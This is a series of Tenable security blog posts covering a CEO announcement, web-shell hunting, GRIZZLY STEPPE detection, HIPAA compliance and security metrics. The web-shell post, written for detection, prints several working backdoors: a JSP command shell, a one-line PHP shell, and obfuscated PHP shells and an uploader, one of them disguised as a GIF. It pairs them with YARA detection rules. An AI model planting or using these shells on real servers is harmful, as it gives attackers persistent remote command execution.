Tenable has announced that Amit Yoran, president of RSA, will be our new Chairman and CEO, effective January 3, 2017. We are honored to welcome one of the security industry’s most esteemed leaders and visionaries to our team.

Amit brings extraordinarily rich experience in security, from government service to his leadership at several highly successful and innovative cybersecurity companies. At RSA, a key billion-dollar security company, Amit has been responsible for strategic direction and operational excellence. Amit came to RSA through the acquisition of NetWitness, a high-growth network forensics company he founded and led as CEO. Prior to NetWitness, he was the founding director of the United States Computer Emergency Readiness Team program (US-CERT) in the U.S. Department of Homeland Security. Amit also founded Riptech (acquired by Symantec in 2002), one of the first managed security service providers (MSSPs).

We are excited about the opportunity to begin 2017 under Amit’s leadership, as we work with you, our customers, to address your cybersecurity challenges—from evolving technologies and ever-increasing attacks, to the need to better understand how security threats translate to business risks.

You can read more about this news in our 12/15/2016 press release.

Web shells are nothing new, but their use continues to plague security professionals and their customers. With low anti-virus detection rates and few good tools to aid in discovery, how can you fight back?

A breach has occurred

On November 25th, 900 San Francisco Municipal Transportation Agency (SFMTA) computers were infected by a ransomware variant known as HDDCryptor. The ransom demand was 100 bitcoins (approximately $73,000). Due to the attack the SFMTA was temporarily unable to collect an estimated $50,000 in fares.

"You Hacked, ALL Data Encrypted, Contact For Key(cryptom27@yandex.com)ID:601, Enter Key:"

The immediate question is: “How did this happen?” In a press release, the SFMTA stated that their network “was not breached from the outside.” However, journalist Brian Krebs, in collaboration with Alex Holden of Holden Security Inc., reported that the SFMTA attacker “has been using a number of tools which enabled the scanning of large portions of the Internet and several specific targets for vulnerabilities” and that the “most common vulnerability used [was] ‘weblogic unserialize exploit’.”

Tenable is quite familiar with the various WebLogic deserialization exploits. The original vulnerability, CVE-2015-4852, was released as a zero day by FoxGlove Security. Further, Oracle’s original fix proved insufficient and led to CVE-2016-0638, CVE-2016-3510, and CVE-2016-5535— the last of which was recently patched in October, nearly a year after the original FoxGlove Security disclosure.

Nessus Flagging Deserialization Vulnerabilities in WebLogic

WebLogic web shell backdoor

Despite the SFMTA’s reassurances, the ransomer further claimed to “still have backdoors in the SMFTA network.” While many may be disinclined to take the word of this criminal, I believe the SFMTA would do well to hunt for any possible backdoors.

If WebLogic was the entry point into the SFMTA network, then it would have been trivial to drop a web shell backdoor onto the server to facilitate future access. WebLogic is perfect for a web shell because it can interpret JavaServer Pages (JSP) files.

For example, I took the following JSP web shell from the ysoserial project and I put it in the directory where WebLogic’s console application stores its cascading style sheets:

<%@ page import="java.util.*,java.io.*"%><html><body><form method="GET" name="myform" action=""><input type="text" name="cmd"><input type="submit" value="Send"></form><pre><%
        if (request.getParameter("cmd") != null)
        {
          out.println("Command: " + request.getParameter("cmd") + "<br>");
          Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
          OutputStream os = p.getOutputStream();
          InputStream in = p.getInputStream();
          DataInputStream dis = new DataInputStream(in);
          String disr = dis.readLine();
          while ( disr != null )
          {
            out.println(disr);
            disr = dis.readLine();
          }
        }
      %></pre></body></html>

I can then remotely execute shell commands from my browser via the WebLogic server:

Not only will this web shell provide backdoor access after WebLogic has been patched, but it also has a ridiculously low antivirus detection rate: 2/54.

Web shells: a wider problem

Web shells aren’t a WebLogic specific problem. Many web servers make great hosts for malicious shells. This has become such a problem that last year US-CERT issued an alert warning about the rising threat of web backdoors.

Web shells may seem obvious and unsophisticated, but advanced actors are using them as well. Deep Panda and Emissary Panda have both been known to use web shells like China Chopper. Crowdstrike wrote a very interesting article detailing a couple of Deep Panda’s backdoors that they encountered on an engagement.

But web shells aren’t just for sophisticated attackers. In my search for web shell samples, I used GitHub to search the many WordPress and Joomla! sites that are backed up there. Unsurprisingly, there are hundreds of these sites just riddled with backdoors. Consider this issue submitted by @tenacioustek:

A large chunk of the blame for that level of infection is not patching an Internet facing server. However, there are other problems that should be considered. For instance, where are the tools for detecting web shells? Certainly, some exist (web shell detector and LOKI), but are they getting used? How well would they operate at an enterprise level?

Another part of the problem is the bad AV detection rates. I already showed you a JSP web shell with a 2/54 rate. In an excellent article by dfir it!, they present this simple PHP shell:

<? system($_REQUEST['cmd']); ?>

which has a detection rate of 0/54.

While there are better detection rates on some more well known shells like PBot (23/54), WSO (30/54), or C99 (45/57), it seems clear to me that AV is not as effective on this front as it could be.

A solution

As part of Nessus v6.8 in July 2016, we released a file system scanner that uses YARA. We even wrote a blog entry about it. YARA is perfect for hunting down web shells.

Consider the following YARA rule:

rule generic_jsp
{
    meta:
        description = "Generic JSP"
        family = "JSP Backdoor"
        filetype = "JSP"
        hash = "6517e4c8f19243298949711b48ae2eb0b6c764235534ab29603288bc5fa2e158"

    strings:
        $exec = /Runtime.getRuntime\(\).exec\(request.getParameter\(\"[a-zA-Z0-9]+\"\)\);/ ascii

    condition:
        all of them
}

This rule causes Nessus® to flag the web shell that I dropped onto the WebLogic server earlier in this blog:

More YARA rules

The problem with YARA is that you need rules for it to work. Unfortunately, Nessus doesn’t yet come with a rule set, but there are great projects like YARA Rules and LOKI that share their web shell rules with the world. Tenable has been working on a rule set that we hope to open source soon. Until then, here are a few of the more interesting web shells that we’ve created rules for.

Consider this PHP web shell:

<?php 
eval(gzinflate(base64_decode("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
JgQEwaoCwYb895+/f//+7/8="))); ?>

This is an obfuscated version of PHP/Small.B that has a detection rate of 8/54 on VirusTotal. Just looking at the code, you probably assume that the eval(gzinflate(base64_decode()))) will unmask the web shell. However, that isn’t the case at all. Instead, this statement generates another eval(gzinflate(base64_decode()))) which will generate another and another and another - until eventually the web shell is finally exposed. You can find the deobfuscated version on GitHub.

Another obfuscated PHP script that we’ve seen is this uploader:

GIF89GHZ<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>

Notice how it starts out with the text GIF89GHZ? I think this is an attempt to fool automated tools into believing that it is a GIF. For example, the Linux file utility says this:

albinolobster@ubuntu:~ $ file 3xp.php 
3xp.php: GIF image data 23112 x 15370

I’m not entirely certain why this particular script uses GIF89GHZ. Far more popular is GIF89a as described here. Either way, you can see again that this script also relies on eval() and built-in PHP functions for obfuscation. Both the obfuscated and deobfuscated versions of this script have fairly low detection rates: 14/54 and 3/49 respectively.

Writing a rule to detect this type of obfuscation isn’t too hard if you are willing to accept that using eval followed by a string modifying function is an indicator of malicious intent:

rule eval_statement
{
    meta:
        description = "Obfuscated PHP eval statements"
        family = "PHP.Obfuscated"
        filetype = "PHP"
        hash = "9da32d35a28d2f8481a4e3263e2f0bb3836b6aebeacf53cd37f2fe24a769ff52"
        hash = "8c1115d866f9f645788f3689dff9a5bacfbee1df51058b4161819c750cf7c4a1"
        hash = "14083cf438605d38a206be33542c7a4d48fb67c8ca0cfc165fa5f279a6d55361"

    strings:
        $obf = /eval[\( \t]+((base64_decode[\( \t]+)|(str_rot13[\( \t]+)|(gzinflate[\( \t]+)|(gzuncompress[\( \t]+)|(strrev[\( \t]+)|(gzdecode[\( \t]+))+/

    condition:
        all of them
}

The last web shell I want to share is this shell shared by @bartblaze that uses the Free Online PHP Obfuscator (FOPO) and has a 0/53 detection rate. The shell is too big to paste here, but we are only really interested in the start. It looks like this:

<?php
/*
Obfuscation provided by FOPO - Free Online PHP Obfuscator:
http://www.fopo.com.ar/ This code was created on Tuesday, March 15th, 2016 at 5:21 UTC from IP 158.255.211.112 (tr) Checksum: e5a931bb23bbcc2dbf286decc8e2b2b72a7d9b0b
*/ $g2a594c0="\x62\x61\163\145\66\64\137\144\145\143\157\144\145";@eval($g2a594c0( "Ly9Oc044UThBMCtXVVJ6NytPQ2VkU0lGeFczNEwrR1NZVlJnZHN5M1pKK01mSXRJUkRYeU1OOGR2RX

This might look a little weird but it is actually pretty straightforward. Cleaned up a bit this is really:

$g2a594c0=”base64_decode”;
@eval($g2a594c0(“…”);

Not too different from what we’ve seen in the previous obfuscated shells right? The only catch is that the Free Online PHP Obfuscator changes up how it encodes the base64_decode string. Here are some samples:

$ueafa759="\x62\141\163\x65\66\64\x5f\x64\x65\143\x6f\x64\145";
$c03a9f9c="\142\141\163\145\x36\64\x5f\x64\x65\x63\157\x64\x65";
$p44aaf5f="\x62\141\163\145\66\64\x5f\x64\145\143\x6f\x64\x65";

Each sample uses a different combination of hex and octal values in order to spell out base64_decode. Luckily, YARA makes this quite easy to detect:

rule fopo
{
    meta:
        description = "Free Online PHP Obfuscator"
        family = "PHP.Obfuscated"
        filetype = "PHP"
        hash = "b96a81b71d69a9bcb5a3f9f4edccb4a3c7373159d8eda874e053b23d361107f0"
        hash = "bbe5577639233b5a83c4caebf807c553430cab230f9a15ec519670dd8be6a924"
        hash = "a698441f817a9a72908a0d93a34133469f33a7b34972af3e351bdccae0737d99"

    strings:
        $base64_decode = /\$[a-zA-Z0-9]+=\"\\(142|x62)\\(141|x61)\\(163|x73)\\(145|x65)\\(66|x36)\\(64|x34)\\(137|x5f)\\(144|x64)\\(145|x65)\\(143|x63)\\(157|x6f)\\(144|x64)\\(145|x65)\";@eval\(/

    condition:
        all of them
}

Conclusion

Malicious web shell use is widespread. If you are in charge of a web server, you must remain vigilant. Keep the server up to date with the latest patches and use any available tooling to ensure that no web shells are hiding on your server.

It’s that time of year. Once we’ve run out of leftover Thanksgiving turkey for sandwiches, and our Black Friday purchases start to show up on our credit card statements, there are two things that seem to happen every year: reviewing the year gone by and making predictions for the year to come. I get it. It’s tradition. However, few ever learn any lessons of value from analyzing the events of the past year and even fewer gain any relevant insight into the year ahead from speculative prognostications—especially because most are either safe and obvious predictions or end up being wrong anyway. With that in mind, I have created a new list of reasons to stop doing that.

1. The past may not be relevant

Lots of stuff happened in the past 12 months. Even if we narrow the focus just to network and data security and security incidents, there’s no shortage of events to reflect on from 2016. However, most of those events affect platforms or technologies you don’t use, or target industries you’re not in, so reviewing them provides little value aside from increasing your knowledge of general information security trivia.

2. The past is not an indication of the future

The events that do relate directly to your industry or company provide greater value, but knowing what happened last year isn’t necessarily helpful for preventing future attacks or breaches. Reacting to past attacks leads to things like taking off shoes at TSA checkpoints. It might have been an effective means of preventing a past attack, but has little—if any—actual impact on preventing future attacks. It’s like closing the barn door after the horses have escaped.

3. Most predictions are wrong

Making predictions about technology or security is a bit like predicting the weather, and has as bad or worse odds of being accurate. Predictions are either painfully obvious—in which case they don’t provide any insight or value at all—or tend to be guesses more than predictions. The guesses are hopefully backed by some intelligent analysis of past and current trends or knowledge of cutting edge technologies, but ultimately they tend to be wish lists more than predictions, and those making them are as surprised as anyone else if or when they come true.

4. Predictions may not be relevant

There are some predictions that end up being accurate. A combination of “even a broken clock is right twice a day” and throwing enough ideas out there results in at least something eventually coming true. Odds are that the few predictions that prove to be accurate will fall into the category of things that don’t apply to your industry or to the platforms and applications your business relies on.

5. Better to look within

Make your own lists. There’s nothing inherently wrong with reviewing the past year or trying to make some educated guesses about the year to come. It makes good business sense. However, rather than relying on technology pundits to provide you with cookie cutter “Top 10” lists, you should analyze your own data and your own history, and use the information you have available to make your own predictions for 2017—predictions that are directly relevant to you and your company.

If you simply must read the post mortem reviews of 2016, or check out the predictions and guesstimations for what 2017 has in store, feel free. I mean, it is tradition—like green beer on St. Patrick’s Day, fireworks on the 4^th of July, or the Detroit Lions playing on Thanksgiving Day. Just do so with a realistic understanding of the value—or lack thereof—those provide for your business, and focus on the things that will actually make the most impact for you.

Looking to 2017, there may be new goals, challenges, and projects that face your organization. This is a good time to take the “10,000 foot view” of what your organization wants to address. While this is a great time to outline and plan new projects, this is also an opportune time to reassess current projects, including the controls put in place to address laws and regulations. One of those laws receiving attention in the news recently is the Health Insurance Portability Accountability Act (HIPAA).

Consequences of noncompliance

Passed into law in 1996, HIPAA is certainly not new. HIPAA is an act that addresses administrative, technical, and physical controls around protecting sensitive patient data. Most organizations under HIPAA’s umbrella already have an understanding of what the act means to their organizations in terms of securing sensitive data. But organizations can also grow complacent in their processes and ultimately become noncompliant, as discussed in our Drifting Out of Compliance blog post. This is a dangerous situation for organizations, as the federal government just fined a university $650,000 for being compromised with remote access malware:

“In the 13th major HIPAA enforcement action so far this year (2016), federal regulators have slapped the University of Massachusetts Amherst with a $650,000 financial settlement and corrective action plan after investigating a relatively small 2013 breach involving a malware infection at a campus speech and language center.”

There have been over $12 million HIPAA-related fines in 2016

Information security is a dynamic sector, regularly changing to remain current with trends, and your organization should not overlook controls and processes that act as the foundation of your overall security program. While the HIPAA acronym may be dated in some people’s minds, the enforcement certainly is not. There have already been over $12 million HIPAA-related fines in 2016 alone. Organizations should regularly assess their current processes that pertain to these controls so that they don’t lose track of their effectiveness.

Our blog, Tips for Making The Most of Your Year-End Spending, provides advice on budgeting for the new fiscal year. Two important tips are evaluating your current environment, and identifying the gaps between your current status and goals. Has your environment expanded at all? Does the new environment fall under HIPAA regulation? If so, do you have proper controls in place to protect that environment?

Two important tips: evaluate your current environment, and identify the gaps between your current status and goals

Tenable solutions

Tenable provides solutions that enable organizations to address these year-end questions by tracking and assessing environments with continuous network monitoring. The Tenable Assurance Report Cards (ARCs) do a great job of quickly analyzing environments against pre-defined baselines with a Pass/Fail grading. Organizations can leverage ARCs to quickly assess whether a previously compliant environment has developed compliance failures, or to grade completely new environments. In addition to ARCs, the HIPAA Configuration Audit Summary dashboard in SecurityCenter Continuous View® (SecurityCenter CV™) has been updated. It provides detailed and relevant data from your environment for security analysis and HIPAA compliance. The dashboard features over ten components that address HIPAA concerns such as:

• Access Control & Workstation Security
• Security Management Process
• Integrity, Authentication & Transmission Security

You can customize these components to fit the uniqueness of your environment. The HIPAA dashboard also automatically tracks the number of hosts for each component, while displaying the percentage of hosts that have passed and the percentage of hosts that have failed.

Conclusion

There are always new trends and concerns to be addressed when securing an environment, but fundamental processes, controls, and compliance should not be forgotten. Organizations can leverage Tenable solutions to keep up with the latest security trends while simultaneously addressing well-established regulation responsibilities such as those put in place by HIPAA.

As the year draws to a close, we’d like to share our most popular blogs from 2016. From UPnP detection to Mr. Robot exploits, our readers were most interested in the technical details of cybersecurity issues. But there’s something for everyone in our top 12 blogs of 2016:

1. Hunting for Web Shells– Jacob Baines 12/20/16    
2. Do You Know Where Your UPnP Is? - Jacob Baines 10/20/16
3. Expanding on a Known Vulnerability: Attacking with Jython - Jacob Baines 9/7/16
4. Threat Hunting with YARA and Nessus - Jacob Baines 7/20/16
5. Tenable Automates NIST Cybersecurity Framework Technical Controls - Ted Gary 3/1/16
6. Mr. Robot vs. the Android - Andrew Freeborn 8/31/16
7. New in Nessus 6.6 - Diane Garey 4/11/16
8. Detecting Mr. Robot Malware– Cody Dumont 8/10/16
9. Auditing Microsoft Azure with Nessus v6.5 - Mehul Revankar 1/26/16
10. What is No-ware?– Ron Gula 1/19/16
11. New Scan Policies, Plugins and Dashboard for CVE-2016-0800: DROWN - Kelly Prevett 3/7/16
12. NIST Cybersecurity Framework Adoption on the Rise - Nicole Cieslak 3/29/16

Did you know you can subscribe to the Tenable Blog? The free subscription service delivers notifications of new blogs every day or once a week right into your email inbox; no need to use an RSS reader to see new Tenable blogs. Go to the Blog Home page, and under Follow Us, click the Blogemailupdates option. Tenable blogs were recommended by such sites as Reddit and France’s Sciences et Avenir this year. Join those in the know and stay informed about the latest cybersecurity news from Tenable!

Governments and businesses around the world are always potential targets for spear phishing campaigns and APTs like GRIZZLY STEPPE. On December 29, 2016 the U.S. Department of Homeland Security (DHS) and Federal Bureau of Investigation (FBI) released a Joint Analysis Report (JAR-16-20296) which included technical details about activity tied to exploitation and the eventual compromise of systems within the United States. The U.S. government is referring to this malicious cyber threat as GRIZZLY STEPPE. The Joint Analysis Report includes GRIZZLY STEPPE indicators of compromise such as a YARA rule and suspicious IP addresses and DNS names. Global organizations must be vigilant about detecting these latest indicators of compromise. SecurityCenter® can easily scan for these indicators and alert on any detections.

How does GRIZZLY STEPPE work?

GRIZZLY STEPPE follows a familiar attack pattern. It targets unsuspecting users with a spear phishing campaign, enticing them to click on a malicious link. As soon as the link is clicked, malicious code is delivered and executed, establishing persistent remote access to that system via a Remote Access Tool (RAT), typically in the form of a web shell.

Once a persistent connection has been established, the next step usually involves escalating privileges and enumerating Active Directory accounts, leading to all sorts of nefarious activity.

Indicators of compromise

The Joint Analysis Report released by DHS and FBI included many Indicators of Compromise (IOCs) which organizations can use to assess if their systems have been compromised. The chief indicator among them is a YARA rule which detects a PHP web shell which was used as part of the GRIZZLY STEPPE campaign.

Here’s the YARA rule :

rule PAS_TOOL_PHP_WEB_KIT
{
meta:
   description = "PAS TOOL PHP WEB KIT FOUND" 
strings:
   $php = "<?php"
   $base64decode = /\='base'\.\(\d+\*\d+\)\.'_de'\.'code'/ 
   $strreplace = "(str_replace("
   $md5 = ".substr(md5(strrev("
   $gzinflate = "gzinflate"
   $cookie = "_COOKIE"
   $isset = "isset"
condition:
   (filesize > 20KB and filesize < 22KB) and
   #cookie == 2 and
   #isset == 3 and
   all of them
}

Tenable’s YARA pattern detection

Last year Tenable released SecurityCenter functionality to look for malicious files based on textual and binary patterns as defined by a YARA rule. You can use this functionality to detect the malicious PAS PHP web shell identified in the Joint Analysis Report on Windows systems. Here is a sample scan based on the GRIZZLY STEPPE YARA rule:

Create a Yara scan policy

1. Click Scans -> Policies -> Add.
2. Select Malware Scan.
3. Enter a scan name.
4. Click Malware and enable File System Scanning.
5. Select the desired Directories and upload the Yara Rules File.
6. Click Submit.
7. Create and run a scan using the new policy.

You can also run a similar YARA scan in Nessus®. Refer to Threat Hunting with YARA and Nessus for instructions on creating a YARA scan in Nessus®.

Suspicious IP/DNS event analysis with SecurityCenter

In addition to the YARA rule, the Joint Analysis Report also included IP addresses and DNS names tied to malicious actors related to the GRIZZLY STEPPE campaign. While many false positives have been reported with these IP addresses and DNS names, you may still want to scan for them or use new more reliable sources if they become available. Using SecurityCenter, you can define a custom Watchlist asset list to look for any events within your organization which are tied to these suspicious IP addresses as follows:

Create a new asset list

1. Click Assets -> Add -> Custom -> Watchlist.
2. Create a file containing the IP addresses.
3. Assign a name to the asset list, such as Grizzly Steppe IPs.
4. Click Submit.

Analyze events

1. Click Analysis -> Events.
2. Configure Event Analysis to include Destination Asset and Source Asset.
3. Select Grizzly Steppe IPs as the asset to watch.
4. Select a timeframe of events to monitor.
5. Click Apply All, and review the events.

Follow similar steps to create assets for malicious DNS names, with the caveat that you may get many false positives.

In addition to Watchlists, you can also add custom IPs, URLs or domains to the built-in threat detection in LCE®. This is done by creating custom files in the LCE plugins directory. Refer to the Tenable Community Discussion for more details.

Protecting your systems

Review activity to and from any suspicious IP addresses related to GRIZZLY STEPPE, especially if it appears to be performing a vulnerability scan. For any public facing Windows systems, run a scan with the YARA signature listed above and review any activity that might indicate a compromise.

Thanks to Rich Walchuck, John Chirhart and Andrew Flick for their contributions to this blog.

A recent study from Dimensional Research, sponsored by Tenable and the Center for Internet Security, titled, “Cybersecurity Frameworks and Foundational Security Controls,” revealed that 95 percent of organizations face technological and business challenges when implementing leading security frameworks: the NIST Framework for Improving Critical Infrastructure Cybersecurity, ISO 27001/27002, CIS Critical Security Controls, and PCI.

95% of global organizations face impediments when implementing security frameworks

The study tallied survey responses from more than 300 U.S. and European IT security decision makers. Respondents from organizations of all sizes across key industries were polled to better understand the adoption and maturity of cybersecurity frameworks and their underlying security controls.

According to survey data, respondents cited shortages in trained staff (57 percent), a lack of necessary tools to automate controls (40 percent) and inadequate budget (39 percent) as the top three challenges in cybersecurity framework adoption. Other factors noted as inhibiting the successful implementation of security controls included lack of prioritization, support from management and reporting capabilities.

A focus on foundational controls

The research drilled into adoption of the five controls designated by the CIS as Foundational Cyber Hygiene. These foundational controls, a subset of the 20 CIS Critical Security Controls for Effective Cyber Defense, are an integral part of virtually all security frameworks, including the NIST Cybersecurity Framework and ISO 27001/27002. On average, only about 50% of organizations have implemented the foundational controls and related sub-controls:

1. Inventory of Authorized and Unauthorized Devices
2. Inventory of Authorized and Unauthorized Software
3. Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers
4. Continuous Vulnerability Assessment and Remediation
5. Controlled Use of Administrative Privileges

Only 6% of surveyed organizations have implemented the 5 foundational CIS controls

The lack of adoption can be partially explained by timing. More than half of the organizations polled have been on their control adoption journey for one year or less. Even so, it is somewhat surprising and disconcerting that only six percent of surveyed organizations have thoroughly implemented the five foundational controls. Lacking these controls organizations cannot help but struggle with preventing, detecting and responding to cyber threats and vulnerabilities.

How do you stack up?

Take our mini survey to see how your control status compares to similar sized organizations.

Get expert advice

To help you realize the benefits of adopting the foundational CIS controls, join Tony Sager, Senior VP and Chief Evangelist with CIS, and me at 2 p.m. ET on January 18, 2017 for Achieving Effective Cyber Hygiene with Critical Controls 1-5. This webinar will cover the following topics:

• Brief review of the latest survey findings on foundational control adoption
• Quantitative and qualitative benefits of foundational control adoption
• Adoption barriers and best-practices for SMB, mid-market and enterprise organization
• Advice for front line infosec practitioners and leaders
• Answers to your specific questions during a live Q&A

Please join us for this opportunity to hear and learn from a leading expert. Your questions and comments are welcome. We look forward to your participation.

Metrics are an important element of making effective business decisions. When it comes to security, metrics can help you determine the performance of current security tools and processes, and identify weaknesses or areas to be improved. Security metrics can also help you identify and thwart an ongoing attack against your network or data. That assumes, however, that you’re looking at the right metrics and acting on the information appropriately.

Wrong metrics yield wrong results

Consider the Titanic, and let’s assume for a minute that metric data was being collected and reported, ostensibly to ensure the ship safely navigates through a sea of icebergs. How valuable would it be for the captain to receive a report detailing the number of deck chairs on the ship, along with how many of them were damaged and in need of repair? Zero.

Capture and analyze the right information

Organizations need to have tools and processes in place that enable them to capture and analyze the right information. From a security perspective, it helps to work backward. Consider what a successful attack looks like, and the events and activities that lead up to it. That way you can identify the appropriate indicators of compromise that should trigger an immediate response.

Right metrics, wrong process

Let’s go back to our Titanic example. It would obviously have been much more valuable for the captain of the Titanic to receive a report detailing the icebergs that had been identified in the path of the ship, along with a series of recommendations for how to adjust navigation to avoid them. If the captain did not regularly view the metrics reports though, and if there was no process in place to separate important information about icebergs from irrelevant information like the number of deck chairs, the results would be the same.

Separate important information from irrelevant information

Another example of having the right information with the wrong process was the data breach of U.S. retail chain Target in late 2013. A 2014 article explains, “Target confirmed Friday that the hack attack against the retailer's point-of-sale (POS) systems that began in late November triggered alarms, which its information security team evaluated and chose to ignore.”

Differentiate critical alerts from trivial alerts

In other words, Target had the right security in place, and the tools to generate the alerts necessary to make security personnel aware that a critical event was happening, but the process for differentiating critical alerts from trivial alerts and responding appropriately to that information was flawed.

Doing metrics the right way

The Titanic examples illustrate that there is a right way and a wrong way to do metrics. First, you have to be focusing on the right metrics—gathering data that actually matters for the important decisions you need to make. Second, you must be able to separate the signal from the noise and have a process in place to ensure that critical and/or timely information is seen and acted upon appropriately.

Respond appropriately

Not all metrics or the processes for handling them need to be about ongoing attacks or urgent incident response. If the iceberg threat was addressed, the captain of the Titanic might still be interested in the current state of deck chair repairs. Gather and report data on as much as you can. Just make sure you can differentiate trivial data from important data—that you can separate actionable intelligence from general information —and ensure that you have the processes in place to respond appropriately to the metrics that matter most.

More information

Recently, Tenable sponsored publication of the ebook, Using Security Metrics to Drive Action: 33 Experts Share How to Communicate Security Program Effectiveness to business Executives and the Board. The ebook is a compilation of essays by security officers who share their best practices for implementing an effective security metrics program. Download your free copy for a gold mine of advice.

Everyone is always talking about metrics. Just like the 1970’s TV show that quipped, “Marcia, Marcia, Marcia,” analysts today are stressing Metrics, Metrics, Metrics. But what security metrics are important and how can we identify the best metrics from the not so useful metrics? When a CISO meets with other C-level executives and board members, the CISO must have a clear expectation of the useful metrics for that organization. Additionally the CISO must be able to communicate the metrics in a story form or narrative, helping the executives to fully understand how the metrics impact their business and overall risk to the organization.

Core vulnerability metrics

Each organization has different security metrics that are important to their operations and business. However, there are several vulnerability metrics that are common across industries and should be considered when discussing security issues with your C-level executives.

• Time to Detect - This metric is the delta from when a vulnerability is created until the time the vulnerability is detected. For example, when a user installs a vulnerable application, until the time the vulnerable application is discovered.
• Time to Containment or Mitigation - This metric indicates how quickly attacks are contained or how long mitigation of a vulnerability takes.
• Baseline Metrics - Establishing a baseline of normal behavior is important before developing a full metrics program. This metric provides a clear understanding of what normal is, and how to understand deviations from normal.
• Patch Management Efficiency - This metric contributes to the understanding of patch cycles and remediation efforts. This metric is different from the Time to Containment or Mitigation because these efforts are based on regular vendor patch release schedules, such as Microsoft’s Patch Tuesday.
• System Hardening Metric - This metric provides insight into the proper configuration of operating systems, applications, and network infrastructure devices.

How SecurityCenter can help

